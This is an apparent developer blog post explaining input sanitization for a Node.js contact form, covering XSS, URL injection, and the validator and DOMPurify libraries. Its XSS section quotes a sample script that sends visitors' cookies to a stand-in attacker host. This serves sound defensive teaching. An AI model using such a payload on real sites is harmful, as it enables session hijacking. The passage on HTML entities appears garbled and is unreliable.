Input Sanitization: What It Is and Why It Matters
A plain-language explanation of input sanitization, common web threats, and how to protect your Node.js app
What Is Input Sanitization?
Any time a user can type something into a form on your website, you have a potential security problem. Input sanitization is the process of cleaning that data before your application does anything with it — storing it, emailing it, or displaying it on a page. The goal is to make sure that whatever the user typed cannot be used to attack your application or the people who use it.
The word "sanitize" is a good one. Think of it like washing vegetables before you cook with them. The vegetables might look fine, but you don't actually know what's been on them. You clean them first as a precaution. Input sanitization is the same idea applied to data.
Why Is This Necessary?
The web is a hostile environment. Any form on a public-facing website will eventually receive malicious input — whether from automated bots scanning for vulnerabilities or from people deliberately trying to exploit your application. This is not a hypothetical. It happens constantly, to websites of every size.
The two biggest categories of attack that input sanitization protects against are Cross-Site Scripting (XSS) and injection attacks.
Cross-Site Scripting (XSS)
Cross-Site Scripting, almost always abbreviated as XSS, is an attack where a malicious user submits JavaScript code as their input, hoping that your application will display it back on a webpage where a browser will execute it.
Here is a simple example. Suppose your site has a comments section and you display what users submit directly on the page. An attacker submits this as their comment:
<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
If your application renders that directly to the page, every visitor's browser will execute it. That script could steal session cookies, redirect users to phishing sites, log keystrokes, or deface your page entirely. The attacker does not need access to your server — they just need your site to repeat their input back to users.
This is why the rule exists: never trust user input, and never render it raw to a webpage.
URL and Link Injection
A simpler but still problematic attack is submitting URLs in form fields. An attacker might submit a link to a phishing site or malware download in a contact form, hoping the link ends up in an email, a database, or a page where someone clicks it. Checking for URLs in input fields and rejecting submissions that contain them is a basic but effective layer of defense.
What We Did and How It Works
On this contact form we used two npm packages: validator and isomorphic-dompurify. Here is what each one does.
validator
validator is a library of string validation and sanitization functions. We used three of its tools:
validator.isEmail(email) — This replaces the hand-written regex that was being used to check email addresses. It is more thorough and handles edge cases that simple regexes miss.
validator.escape(str) — This converts characters that have special meaning in HTML into their safe equivalents called HTML entities. The less-than sign < becomes <, the greater-than sign > becomes >, the forward slash / becomes /, and so on. This is the core defense against XSS. If someone submits <script>alert('attack')</script>, after escaping it becomes <script>alert('attack')</script> — completely harmless text that a browser will display as characters, not execute as code.
validator.stripLow(str) — This removes control characters from the string. Control characters are invisible characters with ASCII values below 32. They have no place in form input and can sometimes be used to manipulate how text is interpreted or displayed.
isomorphic-dompurify
DOMPurify is a well-known HTML sanitization library. The isomorphic version works in Node.js on the server, whereas the original dompurify only works in a browser. DOMPurify parses the input as HTML and removes anything that could execute as code — script tags, event handlers like onclick, javascript: URLs, and other attack vectors. It is a second line of defense after validator.escape and is particularly important if you ever display user input on a webpage.
The URL Check
The containsURL function uses a regular expression to scan the input for anything that looks like a web address. If it finds one, the submission is rejected entirely. This is a hard block — no URL in any field means the submission will not go through.
The Full Sanitization Flow
When a user submits the contact form, here is the order of operations on the server:
- The raw form data arrives in
req.body - Each field is passed through
sanitizeInput(), which runsvalidator.escape,validator.stripLow, andDOMPurify.sanitizein sequence - The cleaned values are passed to
isValidContactFormSubmit(), which checks that all fields are present, that no URLs are present, and that the email address is valid - If validation passes, the cleaned data is used to build the email message and send it
- If validation fails, a 400 error is returned
The important thing to understand is that sanitization happens before validation, and validation happens before the data is used for anything. The data is cleaned, then checked, then used — in that order, every time.
A Note on Defense in Depth
No single security measure is sufficient on its own. The approach used here layers multiple defenses: client-side validation in the browser, URL detection, character escaping, HTML sanitization, and email-only output with no database storage or page rendering of user input. Each layer catches things the others might miss. This concept is called defense in depth and it is a foundational principle of application security.
For a project of this scale the measures implemented here are solid. A production application handling sensitive data would go further — rate limiting to prevent spam and brute force attacks, CSRF tokens to prevent cross-site request forgery, a content security policy header, and likely a dedicated input validation middleware layer. But the fundamentals are the same.